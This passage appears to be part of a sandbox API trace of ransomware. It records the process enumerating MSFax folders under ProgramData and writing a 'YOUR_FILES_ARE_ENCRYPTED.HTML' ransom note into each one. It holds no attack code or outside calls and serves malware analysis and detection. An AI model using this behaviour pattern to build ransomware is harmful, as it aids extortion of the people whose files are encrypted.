ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.958] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0107.958] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="en-US", cAlternateFileName="")) returned 1 [0107.958] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.958] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0107.958] GetProcessHeap () returned 0x600000 [0107.958] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0107.959] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0107.959] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0107.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.961] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="..", cAlternateFileName="")) returned 1 [0107.961] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0107.961] StrStrIW (lpFirst="confident.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.961] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0107.961] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0107.961] lstrlenW (lpString=".cov") returned 4 [0107.961] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0107.961] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4796233, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa4796233, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa4796233, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a09, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="fyi.cov", cAlternateFileName="")) returned 1 [0107.961] StrStrIW (lpFirst="fyi.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.961] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 77 [0107.961] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0107.961] lstrlenW (lpString=".cov") returned 4 [0107.961] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0107.961] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa476ffa8, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa476ffa8, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa476ffa8, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="generic.cov", cAlternateFileName="")) returned 1 [0107.961] StrStrIW (lpFirst="generic.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.962] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 81 [0107.962] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0107.962] lstrlenW (lpString=".cov") returned 4 [0107.962] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0107.962] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4796233, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa4796233, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa4796233, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="urgent.cov", cAlternateFileName="")) returned 1 [0107.962] StrStrIW (lpFirst="urgent.cov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.962] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 80 [0107.962] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0107.962] lstrlenW (lpString=".cov") returned 4 [0107.962] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0107.962] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4796233, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xa4796233, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xa4796233, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x640128, dwReserved1=0x63c6f8, cFileName="urgent.cov", cAlternateFileName="")) returned 0 [0107.962] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.962] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0107.962] GetProcessHeap () returned 0x600000 [0107.962] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.962] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.963] WriteFile (in: hFile=0x304, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.964] CloseHandle (hObject=0x304) returned 1 [0107.964] GetProcessHeap () returned 0x600000 [0107.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.964] GetProcessHeap () returned 0x600000 [0107.964] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.965] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="en-US", cAlternateFileName="")) returned 0 [0107.965] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.965] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.965] GetProcessHeap () returned 0x600000 [0107.965] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.965] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.965] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.967] CloseHandle (hObject=0x32c) returned 1 [0107.968] GetProcessHeap () returned 0x600000 [0107.968] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.968] GetProcessHeap () returned 0x600000 [0107.968] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.969] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="Inbox", cAlternateFileName="")) returned 1 [0107.969] StrStrIW (lpFirst="Inbox", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.970] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0107.970] GetProcessHeap () returned 0x600000 [0107.970] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0108.090] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox" [0108.090] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0108.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0108.091] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0108.091] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 0 [0108.092] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0108.092] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0108.092] GetProcessHeap () returned 0x600000 [0108.092] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0108.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.093] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.094] CloseHandle (hObject=0x32c) returned 1 [0108.095] GetProcessHeap () returned 0x600000 [0108.095] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0108.095] GetProcessHeap () returned 0x600000 [0108.095] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0108.096] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="Queue", cAlternateFileName="")) returned 1 [0108.096] StrStrIW (lpFirst="Queue", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.097] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0108.097] GetProcessHeap () returned 0x600000 [0108.097] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0108.098] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue" [0108.098] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0108.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0108.098] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0108.099] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 0 [0108.099] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0108.099] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0108.099] GetProcessHeap () returned 0x600000 [0108.099] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0108.099] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.100] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.101] CloseHandle (hObject=0x32c) returned 1 [0108.102] GetProcessHeap () returned 0x600000 [0108.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0108.102] GetProcessHeap () returned 0x600000 [0108.102] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0108.103] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0x1c88395, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0108.103] StrStrIW (lpFirst="SentItems", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.103] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0108.103] GetProcessHeap () returned 0x600000 [0108.103] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0108.104] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems" [0108.104] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0108.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0108.104] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 1 [0108.104] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c74c, dwReserved1=0x63c6f0, cFileName="..", cAlternateFileName="")) returned 0 [0108.105] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0108.105] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0108.105] GetProcessHeap () returned 0x600000 [0108.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0108.105] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.106] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.107] CloseHandle (hObject=0x32c) returned 1 [0108.108] GetProcessHeap () returned 0x600000 [0108.108] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0108.108] GetProcessHeap () returned 0x600000 [0108.108] 